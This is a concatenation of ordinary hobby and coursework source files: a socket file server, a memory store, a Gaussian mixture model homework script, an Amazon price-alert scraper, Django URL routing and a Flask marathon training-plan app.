client.send(str.encode(\"File already exists!\"))\n\n else:\n mess = str.encode(\"The server is now dowloading your file...\")\n client.send(mess)\n\n f = urllib.request.urlopen(url).read()\n target = open(\"public/\" + filen, 'a')\n target.write(str(f))\n target.close()\n else:\n client.send(str.encode(\"Incorrect Login\"))\n client.close()\n\ndef MKDR():\n getauth = datas.split(\"///\")\n user = getauth[0]\n target = open(\"users.txt\")\n if user in target.read():\n\n split_com_get = datas.split()\n directory = split_com_get[1]\n\n if not os.path.exists(\"public/\" + directory):\n os.makedirs(\"public/\" + directory)\n target = open(\"public/\" + directory + \"/aaa.a\", 'a')\n content = \"aaa\"\n target.write(content)\n target.close()\n client.send(str.encode(\"Directory created!\"))\n else:\n client.send(str.encode(\"Directory already exists!\"))\n else:\n client.send(str.encode(\"Incorrect Login\"))\n client.close()\n\ndef DEL():\n getauth = datas.split(\"///\")\n user = getauth[0]\n target = open(\"users.txt\")\n if user in target.read():\n split_com_get = datas.split()\n file = split_com_get[1]\n\n if os.path.isfile(\"public/\" + file):\n os.remove(\"public/\" + file)\n client.send(str.encode(\"File removed!\"))\n else:\n client.send(str.encode(\"This file does not exist.\"))\n else:\n client.send(str.encode(\"Incorrect Login\"))\n client.close()\n\ndef LIST():\n try:\n split_com_get = datas.split(\"///\")\n if split_com_get[1] == \"LIST\":\n dst = \"LIST\"\n else:\n dst_b4 = split_com_get[1]\n dst_b3 = dst_b4.split()\n dst = dst_b3[1]\n #print(dst)\n if dst == \"LIST\" or dst == \"LIST public\" or dst == \"LIST public/\":\n\n listing = os.listdir(\"public/\")\n count = 0\n #print(listing[count])\n for f in listing:\n cur_fil = listing[count]\n client.send(str.encode(cur_fil + \"\\n\"))\n count = count + 1\n else:\n listing = os.listdir(\"public/\" + dst)\n count = 0\n #print(listing[count])\n for f in listing:\n cur_fil = listing[count]\n client.send(str.encode(cur_fil + \"\\n\"))\n count = count + 1\n\n\n except FileNotFoundError:\n client.send(str.encode(\"Folder does not exist.\"))\n client.close()\n except NotADirectoryError:\n client.send(str.encode(\"This is a file, not a directory.\"))\n client.close()\n except:\n print(\"Generic Error Occoured during LIST.\")\n\ndef TIME():\n current_time = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.gmtime(epoch))\n print(current_time)\n client.send(str.encode(str(current_time)))\n\ndef HELP():\n help = \"Commands: GET, SNDTXT, GURL, MKDR, DEL, LIST, TIME\"\n client.send(str.encode(help))\n\nwhile 1:\n\n try:\n\n epoch = calendar.timegm(time.gmtime())\n\n client, address = s.accept()\n data = client.recv(1024)\n datas = (data.decode(encoding='UTF-8'))\n print(str(address))\n #print(\"Connection from: \" + str(address) + \" | Command: \" + datas)\n\n # Log the User\n target = open(\"logs/\" + \"log.txt\", 'a')\n content = address[0] + \" | \" + datas + \" | \" + str(epoch) + \"\\n\"\n target.write(content)\n target.close()\n\n if \"..\" in datas:\n nope = str.encode(\"I don't think so...\")\n client.send(nope)\n client.close()\n\n elif \"&&&&&ACK\" in datas:\n\n datac = datas.split(\"###\")\n datad = datas.split(\"|||\")\n filename = datad[1]\n size_file = datac[1]\n print(filename)\n print(size_file)\n\n WRTFILE(filename, size_file)\n print(\"did it get here?\")\n\n elif \"DWNLOAD\" in datas:\n\n dataX = datas.split(\"|||\")\n DWNLOAD(dataX[1])\n\n elif \"GET\" in datas:\n GET()\n\n elif \"SNDTXT\" in datas:\n SNDTXT()\n\n elif \"GURL\" in datas:\n GURL()\n\n elif \"MKDR\" in datas:\n MKDR()\n\n elif \"DEL\" in datas:\n DEL()\n\n elif \"MOVE\" in datas:\n MOVE()\n\n elif \"LIST\" in datas:\n LIST()\n\n elif \"TIME\" in datas:\n TIME()\n\n elif \"HELP\" in datas:\n HELP()\n\n elif \"MATRIX\" in datas:\n client.send(str.encode(\"Follow the white rabbit...\"))\n\n else:\n rep = str.encode(\"I don't understand the commmand: \" + datas)\n client.send(rep)\n\n except:\n print(\"Unexpected error:\", sys.exc_info())\n client.close()\n\n finally:\n client.close()\n","sub_path":"server/echo.py","file_name":"echo.py","file_ext":"py","file_size_in_byte":8575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"419779616","text":"from Store import Store\n\nclass MemoryStore(Store):\n def __init__(self):\n Store.__init__(self)\n self.database = {}\n\n def store_record(self, table, record):\n if table not in self.database:\n self.database[table] = {}\n\n db = self.database[table]\n pk = self.get_primary_key_fields(table)\n pk_values = (record[f] for f in pk)\n db[pk_values] = record\n\n def get_records(self, table_name, search=None, **kwargs):\n if kwargs:\n if search is None:\n search = kwargs\n else:\n search.update(kwargs)\n\n if table_name not in self.database:\n self.database[table_name] = {}\n\n db = self.database[table_name]\n records = []\n if search is None:\n for record in db.values():\n records.append(record)\n else:\n for record in db.values():\n found = True\n for k, v in search.iteritems():\n if record[k] != v:\n found = False\n break\n if found:\n records.append(record)\n\n return records\n\nif __name__ == '__main__':\n import pprint\n\n table_def = {\n 'name': \"settings\",\n \"fields\": [\n\n {'name': 'key', 'type': 'char', 'length': 20},\n {'name': 'value', 'type': 'char', 'length': 1000}\n ],\n 'primary_key': 'key'\n }\n\n store = MemoryStore()\n store.register_table(table_def)\n print(\"PK: %s\" % store.get_primary_key_fields('settings'))\n print(\"fields: %s\" % store.get_all_field_names('settings'))\n print(\"definition:\")\n pprint.pprint(store.get_definition('settings'))\n\n store.store_record('settings', {'key': 'test', 'value': 'aap'})\n store.store_record('settings', {'key': 'other', 'value': 'mies'})\n\n print(store.get_records('settings'))\n print(store.get_records('settings', {'key': 'other'}))\n print(store.get_records('settings', key='test'))\n","sub_path":"scratch/MemoryStore.py","file_name":"MemoryStore.py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"608539847","text":"# # Gaussian Mixture Models\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport utils\nfrom scipy.stats import multivariate_normal\nfrom gmm import GaussianMixtureModel\nfrom tabulate import tabulate\n\n\ndef plot_contour_gaussian(ax, mean, covariance, eps=1e-2):\n \"\"\" Plot the contour of a 2d Gaussian distribution with given mean and \n covariance matrix\n\n Args:\n ax (matplotlib.axes.Axes):\n Subplot used to plot the contour\n mean (numpy.array):\n Mean of the gaussian distribution\n covariance (numpy.array):\n Covariance matrix of the distribution\n eps:\n The cut off to draw the contour plot. The higher the value, \n the smaller the contour plot.\n\n Returns:\n None\n\n \"\"\"\n x1_range = np.linspace(-6, 8, 100)\n x2_range = np.linspace(-10, 8, 100)\n X1, X2 = np.meshgrid(x1_range, x2_range, indexing='ij')\n Z = np.concatenate((X1.flatten()[:, np.newaxis], X2.flatten()[:, np.newaxis]), axis=1)\n P = multivariate_normal.pdf(Z, mean, covariance)\n P[P < eps] = 0\n P = P.reshape((len(x1_range), len(x2_range)))\n ax.contour(x1_range, x2_range, P.T, colors='black', alpha=0.2)\n\n\ndef plot_gmm_model(ax, learned_model, test_data, percent):\n \"\"\" Plot the learned GMM and its associated gaussian distribution\n against the test data\n\n Args:\n ax (matplotlib.axes.Axes):\n Subplot used to plot the contour\n\n learned_model (GaussianMixtureModel):\n A trained GMM\n \n test_data (numpy.float):\n The testing data\n\n percent (float):\n The percentage of training data, used to label the subplot\n\n Returns:\n None\n\n \"\"\"\n for k in range(learned_model.K):\n plot_contour_gaussian(ax, learned_model.mus[k, :], learned_model.covariances[k, :, :])\n ax.scatter(test_data[:, 0], test_data[:, 1], alpha=0.5)\n ax.scatter(learned_model.mus[:, 0], learned_model.mus[:, 1], c=\"r\")\n ax.set_ylim(-10, 8)\n ax.set_xlim(-6, 8)\n ax.set_title(f\"{percent}%\")\n\n\ndef plot_multiple_contour_plots(learned_models):\n \"\"\" Plot multiple learned GMMs\n\n Arg:\n learned_models (list):\n A list of learned models that were trained on 10%,\n 20%, 30%, ..., 100% of training data\n \n Returns:\n fig:\n The figure handle which you can use to save the figure\n\n Example usage:\n >>> learned_models = ... # A list of trained GMMs trained on increasing data\n >>> fig = plot_multiple_contour_plots(learned_models)\n >>> fig.savefig(\"4(a)(ii).png)\n\n \"\"\"\n fig, axes = plt.subplots(4, 3, figsize=(14, 14))\n\n axes = axes.flatten()\n percentage_data = np.arange(10, 101, 10)\n X_test_all = utils.load_data_from_txt_file(\"P3/X_test.txt\")\n for i, learned_model in enumerate(learned_models):\n plot_gmm_model(axes[i], learned_model, X_test_all, percentage_data[i])\n\n axes[-1].axis('off')\n axes[-2].axis('off')\n return fig\n\n\n################################################\n# Problem 3a\n################################################\nprint('-----------------------------------------------------------------------')\nprint('Generate learning curve (K = 3)...')\n# Container for all models\nlearned_models = []\n\n# Container to store log-likelihoods\nlog_likelihoods = np.zeros([10, 2])\n\n# Load training, testing data\nx_train = utils.load_data_from_txt_file(\"P3/X_train.txt\")\nx_test = utils.load_data_from_txt_file(\"P3/X_test.txt\")\nN, d = x_train.shape\n\n# Initialize target number of Gaussians and training partitions\nK = 3\nperms = [10, 20, 30, 40, 50, 60, 70, 80, 90, 100]\n\n# Initialize mixing coefficients\nmix_coeff = np.zeros((K,))\nmix_coeff[:] = 1 / K\n\n# Initialize covariance matrices\ncovar = np.zeros((K, d, d))\ncovar[:] = np.eye(d)\n\ntrain_l = None\ntest_l = None\nit = None\n# Loop through all permutations of training data\nfor frac, perm in enumerate(perms):\n # Load training data from current permutation\n x_train_perm = utils.load_data_from_txt_file(\"P3/TrainSubsets/X_train_\" + str(perm) + \"%.txt\")\n\n # Load mean initializations\n mu = utils.load_data_from_txt_file(\"P3/MeanInitialization/Part_a/mu_\" + str(perm) + \"%.txt\")\n\n # Instantiate Gaussian mixture model object\n gmm_mdl = GaussianMixtureModel(K, mu, covar, mix_coeff)\n\n # Learn gmm model on current permutation of training data\n gmm_mdl.fit(x_train_perm)\n\n # Store current model\n learned_models.append(gmm_mdl)\n\n # Train and test log-likelihood\n train_log = gmm_mdl.compute_llh(x_train_perm)\n test_log = gmm_mdl.compute_llh(x_test)\n\n # Save log-likelihood values for permutation 100\n if perm == 100:\n train_l = train_log\n test_l = test_log\n it = gmm_mdl.it\n print(\"For permutation \" + str(perm) + \", iteration \" + str(gmm_mdl.it) +\n \", normalized training log-likelihood is: \" + str(round(train_log, 4)) +\n \", normalized test log-likelihood is: \" + str(round(test_log, 4)))\n\n # Save log-likelihoods\n log_likelihoods[frac, 0] = train_log\n log_likelihoods[frac, 1] = test_log\n\n# Generate contour plot\nfig = plot_multiple_contour_plots(learned_models)\nfig.savefig(\"Plots/3(a)(ii).png\")\n\nprint(\"\\nParameters of final model:\")\n# Generate table of data for 100% permutation\nrows, cols = (5, 2)\nnames = ['K', 'Permutation', 'Iterations', 'Normalized training log-likelihood', 'Normalized test log-likelihood']\nvalues = [str(K), str(100) + '%', str(it), str(round(train_l, 4)), str(round(test_l, 4))]\nfilename = 'Plots/3(a)(ii).txt'\nutils.tabulate_data(rows, cols, names, values, \"center\", \"num\", filename, 'w')\n\n# Generate table of means\nrows, cols = (3, 2)\nnames = ['Mean 1', 'Mean 2', 'Mean 3']\nvalues = [str(np.round(learned_models[9].mus[0], 4)),\n str(np.round(learned_models[9].mus[1], 4)),\n str(np.round(learned_models[9].mus[2], 4))]\nfilename = 'Plots/3(a)(ii)_means.txt'\nutils.tabulate_data(rows, cols, names, values, \"right\", \"str\", filename, 'w')\n\n# Generate table of covariances\nrows, cols = (3, 2)\nnames = ['Covariance 1', 'Covariance 2', 'Covariance 3']\nvalues = [str(np.round(learned_models[9].covariances[0], 4)),\n str(np.round(learned_models[9].covariances[1], 4)),\n str(np.round(learned_models[9].covariances[2], 4))]\nfilename = 'Plots/3(a)(ii)_covariances.txt'\nutils.tabulate_data(rows, cols, names, values, \"right\", \"str\", filename, 'w')\n\n# Generate table of mixing coefficients\nrows, cols = (3, 2)\nnames = ['Mixing coefficient 1', 'Mixing coefficient 2', 'Mixing coefficient 3']\nvalues = [str(np.round(learned_models[9].mixing_coeff[0], 4)),\n str(np.round(learned_models[9].mixing_coeff[1], 4)),\n str(np.round(learned_models[9].mixing_coeff[2], 4))]\nfilename = 'Plots/3(a)(ii)_mixing_coefficients.txt'\nutils.tabulate_data(rows, cols, names, values, \"right\", \"str\", filename, 'w')\nprint('-----------------------------------------------------------------------')\n\n# Plot Log-likelihoods\nfig, ax = plt.subplots()\nax.plot(np.linspace(10, 100, num=10), log_likelihoods[:, 0], marker='o', c='b', label='Training Log-Likelihood')\nax.plot(np.linspace(10, 100, num=10), log_likelihoods[:, 1], marker='o', c='r', label='Test Log-Likelihood')\nplt.title('GMM Learning Curve')\nplt.legend()\nplt.xlim(0, 110)\nax.set_xlabel('Training Partition (%)')\nax.set_ylabel('Normalized Log-Likelihood')\nfig.savefig(\"Plots/3(a)(i).png\")\nplt.show(block=False)\n################################################\n# Problem 3b\n################################################\nprint('Performing cross-validation...')\n\n# Target Gaussians\ngauss = [1, 2, 3, 4, 5]\n\n# Container to store log-likelihoods and cross validation log-likelihood\nlog_likelihoods = np.zeros([len(gauss), 2])\nlog_likelihoods_cross = np.zeros([5, len(gauss)])\n\n# Loop through all K values\nfor idx_K, K in enumerate(gauss):\n # Initialize mixing coefficients\n mix_coeff = np.zeros((K,))\n mix_coeff[:] = 1 / K\n\n # Initialize covariance matrices\n covar = np.zeros((K, d, d))\n covar[:] = np.eye(d)\n\n # Load mean initializations\n mu = utils.load_data_from_txt_file(\"P3/MeanInitialization/Part_b/mu_k_\" + str(K) + \".txt\")\n\n # Instantiate Gaussian mixture model object for current K value\n gmm_mdl = GaussianMixtureModel(K, mu, covar, mix_coeff)\n\n # Learn gmm model on full training data\n gmm_mdl.fit(x_train)\n\n # Train and test log-likelihood\n train_log = gmm_mdl.compute_llh(x_train)\n test_log = gmm_mdl.compute_llh(x_test)\n\n # Save log-likelihoods\n log_likelihoods[idx_K, 0] = train_log\n log_likelihoods[idx_K, 1] = test_log\n\n # Loop through all folds\n for idx_cross, fold in enumerate(gauss):\n # Load training/testing data from current fold\n x_train_fold = utils.load_data_from_txt_file(\"P3/CrossValidation/X_train_fold\" + str(fold) + \".txt\")\n x_test_fold = utils.load_data_from_txt_file(\"P3/CrossValidation/X_test_fold\" + str(fold) + \".txt\")\n\n # Learn gmm model on training fold\n gmm_mdl.fit(x_train_fold)\n\n # Test log-likelihood for respective fold\n test_fold_log = gmm_mdl.compute_llh(x_test_fold)\n\n # Save cross log-likelihoods\n log_likelihoods_cross[idx_cross, idx_K] = test_fold_log\n\n print(\"For K = \" + str(K) + \", normalized training log-likelihood is: \" + str(round(train_log, 4)) +\n \", normalized test log-likelihood is: \" + str(round(test_log, 4)) +\n \", average cross validation log-likelihood is: \" + str(round(np.average(log_likelihoods_cross[:, idx_K]), 4)))\n# Optimal K value\nk_chosen = gauss[np.argmax(np.average(log_likelihoods_cross, axis=0))]\nprint(\"Selected value of K is: \" + str(k_chosen))\n\n# Generate table\nrows, cols = (4, 2)\nnames = ['Selected value of K:', 'Average cross validation log-likelihood ',\n 'Normalized training log-likelihood', 'Normalized test log-likelihood']\nvalues = [str(k_chosen), str(round(np.max(np.average(log_likelihoods_cross, axis=0)), 4)),\n str(round(log_likelihoods[np.argmax(np.average(log_likelihoods_cross, axis=0)), 0], 4)),\n str(round(log_likelihoods[np.argmax(np.average(log_likelihoods_cross, axis=0)), 1], 4))]\nfilename = 'Plots/3(b).txt'\nutils.tabulate_data(rows, cols, names, values, \"center\", \"num\", filename, 'w')\nprint('-----------------------------------------------------------------------')\n\n# Plot Log-likelihoods\nfig, ax = plt.subplots()\nax.plot(gauss, log_likelihoods[:, 0], marker='o', c='b', label='Training Log-Likelihood')\nax.plot(gauss, log_likelihoods[:, 1], marker='o', c='r', label='Test Log-Likelihood')\nax.plot(gauss, np.average(log_likelihoods_cross, axis=0), marker='o', c='k',\n label='Cross-Validation Log-Likelihood')\nplt.title('GMM Learning Curve')\nplt.legend()\nplt.xticks(np.arange(1, 6))\nax.set_xlabel('No. Gaussians')\nax.set_ylabel('Normalized Log-Likelihood')\nfig.savefig(\"Plots/3(b).png\")\nplt.show(block=False)\n","sub_path":"PS4/ps4-kit/PS4-P3.py","file_name":"PS4-P3.py","file_ext":"py","file_size_in_byte":10916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"468619411","text":"import requests \nfrom bs4 import BeautifulSoup\nimport smtplib\nimport time\n\nURL = 'https://www.amazon.com/Apple-MacBook-16-Inch-16GB-Storage/dp/B081FV1Y57/ref=sr_1_3?crid=356Z7N430I8HA&keywords=macbook+pro&qid=1574195569&sprefix=mac%2Caps%2C158&sr=8-3'\n\nheaders = {\"User-Agent\": 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36'}\n \ndef checkPrice():\n page = requests.get(URL, headers=headers)\n soup = BeautifulSoup(page.content, 'html.parser')\n title = soup.find(id=\"productTitle\").get_text()\n \n price = soup.find(id=\"priceblock_ourprice\").get_text()\n converted_price = float(price[1:].replace(',', ''))\n if converted_price > 2500 :\n sendMail()\n\n print(title.strip())\n print(converted_price)\n\n\ndef sendMail():\n server = smtplib.SMTP('smtp.gmail.com', 587)\n server.ehlo()\n server.starttls()\n server.ehlo()\n\n # Turn on the less secure app from google \n server.login('saliv4402@gmail.com', '')\n\n subject = 'Price Fell Down!'\n body = f'Check amazon Link: {URL}'\n\n msg = f\"Subject: {subject}\\n\\n{body}\"\n\n server.sendmail(\n 'saliv440@gmail.com',\n 'sali.vishwaraj@gmail.com',\n msg \n )\n\n print('Email has been sent!!!')\n server.quit()\n\nwhile True:\n checkPrice()\n time.sleep(60 * 60)","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"185554947","text":"from django.urls import include, path\nfrom rest_framework import routers\nfrom api import views\n\nrouter = routers.DefaultRouter()\nrouter.register(r'users', views.UserViewSet)\nrouter.register(r'groups', views.GroupViewSet)\nrouter.register(r'company', views.CompanyViewSet)\nrouter.register(r'people', views.PeopleViewSet)\n\n# Wire up our API using automatic URL routing.\n# Additionally, we include login URLs for the browsable API.\nurlpatterns = [\n path('', include(router.urls)),\n path('api-auth/', include('rest_framework.urls', namespace='rest_framework')),\n path('commonfriends///',\n views.CommonFriendsView.as_view(), name='common_friends'),\n]\n","sub_path":"paranuara/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"179957757","text":"\"\"\"Training generator\"\"\"\n\nfrom jinja2 import StrictUndefined\n\nfrom flask import Flask, render_template, redirect, request, flash, session\nfrom flask_debugtoolbar import DebugToolbarExtension\nfrom datetime import timedelta\nimport calculator\nfrom model import connect_to_db, db, User, Race, Pace\n\napp = Flask(__name__)\n\n#required for Flask session and the debug toolbar\napp.secret_key = \"ABC\"\n\n# so undefined variable in Jinga2 doesn't fail silently\n# app.jinja_env.undefined = StrictUndefined\nTRAINING_PLAN = [\n (0.60, \"Easy runs @ {easy} to meet mileage goals\"),\n (0.60, \"Easy runs @ {easy} to meet mileage goals\"),\n (0.60, \"Easy runs @ {easy} to meet mileage goals\"),\n (0.60, \"Easy runs @ {easy} to meet mileage goals\",\n \"Long run @ {easy}, distance: {0.162 * peakmileage} \"),\n (0.60, \"Easy runs @ {easy} to meet mileage goals\",\n \"Long run @ {easy}, distance: {0.162 * peakmileage} \"),\n (0.60, \"Easy runs @ {easy} to meet mileage goals\",\n \"Long run @ {easy}, distance: {0.162 * peakmileage} \"),\n (0.80, \"Long run @ {easy}, distance: {0.216 * peakmileage} \",\n \"Tempo - 20 minutes @ {tempo} broken into 2 x 10 minutes with 1 minutes rest\"),\n (0.80, \"Long run @ {easy}, distance: {0.216 * peakmileage} \",\n \"Tempo - 20 minutes @ {tempo} broken into 2 x 10 minutes with 1 minutes rest\"),\n (0.70, \"Two Easy runs @ {easy}, total distance: {0.189 * peakmileage}\",\n \"Tempo - 30 minutes @ {tempo} broken into 3 x 10 minutes with 1 minutes rest\"),\n (0.90, \"Long run @ {easy}, distance: {0.243 * peakmileage} \",\n \"Tempo - 30 minutes @ {tempo} broken into 3 x 10 minutes with 1 minutes rest\"),\n (0.90, \"Long run @ {easy}, distance: {0.243 * peakmileage} \",\n \"Tempo - 30 minutes @ {tempo} broken into 2 x 15 minutes with 1 minutes rest\"),\n (0.70, \"Marathon run for 12 miles @ {marathon}. Finish with 5 to 6 20-30 second strides with 1 minutes rest.\",\n \"Tempo - 30 minutes @ {tempo} broken into 2 x 15 minutes with 1 minutes rest\"),\n (1.0, \"Tempo 3 x 5 minutes @ {tempo}, with 1 minute rest. Easy ({easy}) for 60 minutes. Tempo 3 x 5 minutes @ {tempo}, with 1 minute rest. \",\n \"Tempo 2 x 10 minutes @ {tempo}, with 2 minute rest. Easy ({easy}) for 75 minutes.\"),\n (0.90, \"Marthon pace ({marathon}), for 15 miles.\",\n \"Tempo 2 x 10 minutes @ {tempo}, with 2 minute rest. Easy ({easy}) for 75 minutes.\"),\n (1.0, \"Long run @ {easy}, distance: {0.25 * peakmileage} \",\n \"Tempo 2 x 10 minutes @ {tempo}, with 2 minute rest. Easy ({easy}) for 75 minutes.\"),\n (0.80, \"Tempo 3 x 5 minutes @ {tempo}, with 1 minute rest. Easy ({easy}) for 60 minutes. Tempo 3 x 5 minutes @ {tempo}, with 1 minute rest. \",\n \"Tempo 2 x 10 minutes @ {tempo}, with 2 minute rest. Easy ({easy}) for 75 minutes.\"),\n (0.80, \"Marathon pace ({marathon}) for 12 miles.\",\n \"Easy pace ({easy}) for 2 miles. Tempo - 25 minutes @ {tempo} broken into 5 x 5 minutes with 1 minute rest\"),\n (0.60, \"Two Easy runs @ {easy}, total distance: {0.162 * peakmileage}\",\n \"Easy pace ({easy}) for 2 miles. Tempo - 25 minutes @ {tempo} broken into 5 x 5 minutes with 1 minute rest\"),\n]\n\n\n@app.route(\"/\")\ndef index():\n \"\"\"Homepage.\"\"\"\n\n return render_template(\"home.html\")\n\n\n # return render_template(\"home.html\", blah=blah)\n\n@app.route(\"/calculate-VDOT\", methods=[\"POST\"])\ndef create_table():\n hr = request.form.get(\"hours\")\n mm = request.form.get(\"minutes\")\n ss = request.form.get(\"seconds\")\n peak_mileage = float(request.form.get(\"mileage\"))\n units = request.form.get(\"units\")\n distance = float(request.form.get(\"distance\"))\n email = request.form.get(\"email\")\n\n # have function in calculator.py (with doctest) would it be clear to call .calculator.function()?\n time = float(mm) + (float(hr) * 60) + (float(ss) / 60)\n\n distance_in_meters = calculator.convert_distance_to_meters(distance, units)\n\n # should exist on Race class, remove VDOT variable\n # VDOT = calculator.user_VDOT(distance, units, time)\n # print VDOT\n # session[\"VDOT\"] = VDOT\n # -------TODO--------\n # send distance and time to races tabel under user email/id\n new_user = User(email=email, weekly_mileage=peak_mileage)\n db.session.add(new_user)\n db.session.commit()\n\n user_obj = User.query.filter(User.email == email).first()\n user_id = user_obj.user_id\n session[\"user_id\"] = user_id\n\n new_race = Race(user_id=session[\"user_id\"], distance=distance_in_meters, time=time)\n db.session.add(new_race)\n db.session.commit()\n\n session[\"VDOT\"] = new_race.VDOT()\n\n return render_template(\"generate-calendar.html\", VDOT=session[\"VDOT\"])\n\n\ndef gen_training_plan(easy, marathon, tempo, peak_mileage):\n \"\"\"Returns full training plan as [(fraction peak_mileage, [q1, q2])]\"\"\"\n\n training_plan = [\n # (fraction peak_mileage, [Q1,\n # Q2])\n (0.60, [\"Easy runs @ \" + easy + \", to meet mileage goals\"]),\n (0.60, [\"Easy runs @ \" + easy + \", to meet mileage goals\"]),\n (0.60, [\"Easy runs @ \" + easy + \", to meet mileage goals\"]),\n (0.60, [\"Easy runs @ \" + easy + \", to meet mileage goals\",\n \"Long run @ \" + easy + \", distance: \" + 0.162 * peak_mileage]),\n (0.60, [\"Easy runs @ \" + easy + \", to meet mileage goals\",\n \"Long run @ \" + easy + \", distance: \" + 0.162 * peak_mileage]),\n (0.60, [\"Easy runs @ \" + easy + \", to meet mileage goals\",\n \"Long run @ \" + easy + \", distance: \" + 0.162 * peak_mileage]),\n (0.80, [\"Long run @ \" + easy + \", distance: \" + 0.216 * peak_mileage,\n \"Tempo - 20 minutes @ \" + tempo + \", broken into 2 x 10 minutes with 1 minutes rest\"]),\n (0.80, [\"Long run @ \" + easy + \", distance: \" + 0.216 * peak_mileage,\n \"Tempo - 20 minutes @ \" + tempo + \", broken into 2 x 10 minutes with 1 minutes rest\"]),\n (0.70, [\"Two Easy runs @ \" + easy + \", total distance:\" + 0.189 * peak_mileage,\n \"Tempo - 30 minutes @ \" + tempo + \", broken into 3 x 10 minutes with 1 minutes rest\"]),\n (0.90, [\"Long run @ \" + easy + \", distance: \" + 0.243 * peak_mileage,\n \"Tempo - 30 minutes @ \" + tempo + \", broken into 3 x 10 minutes with 1 minutes rest\"]),\n (0.90, [\"Long run @ \" + easy + \", distance: \" + 0.243 * peak_mileage,\n \"Tempo - 30 minutes @ \" + tempo + \", broken into 2 x 15 minutes with 1 minutes rest\"]),\n (0.70, [\"Marathon run for 12 miles @ \" + marathon + \". Finish with 5 to 6 20-30 second strides with 1 minutes rest.\",\n \"Tempo - 30 minutes @ \" + tempo + \", broken into 2 x 15 minutes with 1 minutes rest\"]),\n (1.0, [\"Tempo 3 x 5 minutes @ \" + tempo + \", with 1 minute rest. Easy run @ \" + easy + \", for 60 minutes. Tempo 3 x 5 minutes @ \" + tempo + \", with 1 minute rest.\",\n \"Tempo 2 x 10 minutes @ \" + tempo + \", with 2 minute rest. Easy run @ \" + easy + \", for 75 minutes.\"]),\n (0.90, [\"Marthon - 15 miles @ \" + marathon,\n \"Tempo 2 x 10 minutes @ \" + tempo + \", with 2 minute rest. Easy run @ \" + easy + \", for 75 minutes.\"]),\n (1.0, [\"Long run @ \" + easy + \", distance: \" + 0.25 * peak_mileage,\n \"Tempo 2 x 10 minutes @ \" + tempo + \", with 2 minute rest. Easy run @ \" + easy + \", for 75 minutes.\"]),\n (0.80, [\"Tempo 3 x 5 minutes @ \" + tempo + \", with 1 minute rest. Easy run @ \" + easy + \", for 60 minutes. Tempo 3 x 5 minutes @ \" + tempo + \", with 1 minute rest.\",\n \"Tempo 2 x 10 minutes @ \" + tempo + \", with 2 minute rest. Easy run @ \" + easy + \", for 75 minutes.\"]),\n (0.80, [\"Marathon run for 12 miles @ \" + marathon,\n \"Easy run @ \" + easy + \", for 2 miles. Tempo - 25 minutes @ \" + tempo + \", broken into 5 x 5 minutes with 1 minute rest.\"]),\n (0.60, [\"Two Easy runs @ \" + easy + \", total distance: \" + 0.162 * peak_mileage,\n \"Easy run @ \" + easy + \", for 2 miles. Tempo - 25 minutes @ \" + tempo + \", broken into 5 x 5 minutes with 1 minute rest\"])\n ]\n return training_plan\n\n\n@app.route(\"/generate-calendar\")\ndef creat_calendar():\n # change this to call off the user_id when you have login conf.\n VDOT = session[\"VDOT\"]\n user_id = session[\"user_id\"]\n # make a pace instance(s) ---> returns obj, see convert_timedelta() bellow\n easy = Pace(VDOT, \"easy\")\n marathon = Pace(VDOT, \"marathon\")\n tempo = Pace(VDOT, \"tempo\")\n\n # query for peak mileage\n user = User.query.filter(User.user_id == user_id).first()\n peak_mileage = user.weekly_mileage\n # call gen_taining_plan()\n user_plan = gen_training_plan(easy, marathon, tempo, peak_mileage)\n\n\n # 11/3 this may need to live in another place\n # 11/3 will call all EMT through this function, as for loop?\n # see workspace.py for more \"tests\"\ndef convert_timedelta(list):\n \"\"\"Return list of pace times converted from timedelta object\n\n >>> test = [1, 2, 3, 4, 5, 6, 7]\n >>> test1 = test[-5:]\n >>> print test1\n >>> [3, 4, 5, 6, 7]\"\"\"\n\n time_range = []\n for i in list:\n time_str = str(i)\n token_time = time_str.split(\".\")\n time = token_time[0]\n time = time[-5:]\n time_range.append(time)\n return time_range\n\n return render_template(\"training-plan.html\", training_plan=user_plan)\n\nif __name__ == \"__main__\":\n #must set to true befor invoking DebugToolbarExtension\n app.debug = True\n\n connect_to_db(app)\n\n # comment out to turn debug off\n DebugToolbarExtension(app)\n\n app.run()\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":9542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"535235636","text":"\nfrom socket import *\nimport _thread\nfrom datetime import datetime, timedelta\nimport xml.etree.ElementTree as ET\n\n#user post status\t\ndef add_status(filename,message):\n\tif filename.split(\"/\")[-1] == 'new-status':\n\t\tstatusContent = message.split(\"\\n\")[15] #get status message from txt box\n\t\ttimestamp = datetime.now()\n\t\tlastmodified = datetime.now() #+ timedelta(seconds=600)\n\t\ttimestamp = timestamp.strftime('%a, %d %b %Y %H:%M:%S GMT') \n\t\tlastmodified = lastmodified.strftime('%a, %d %b %Y %H:%M:%S GMT') \n\t\tprint(statusContent,timestamp,lastmodified)\n\t\tupdate_status_xml(timestamp,lastmodified, statusContent)\n\t\ndef update_status_xml(timestamp, lastmodified, statusContent):\n\ttree = ET.parse(\"status.xml\")\n\troot = tree.getroot()\n\tparser = ET.XMLParser()\n\tparser.feed (\"\")\n\tparser.feed (\"\" + lastmodified + \"\")\n\tparser.feed (\"\" + timestamp + \"\")\n\tparser.feed (\"\" + statusContent + \"\")\n\tparser.feed (\"\")\n\tparser.feed (\"\")\n\telement = parser.close()\n\troot.append(element)\n\ttree.write(\"status.xml\")\n\n#user like friend status\ndef add_like(filename):\n\tif len(filename.split(\"/\")) > 3:\n\t\tif filename.split(\"/\")[-2] 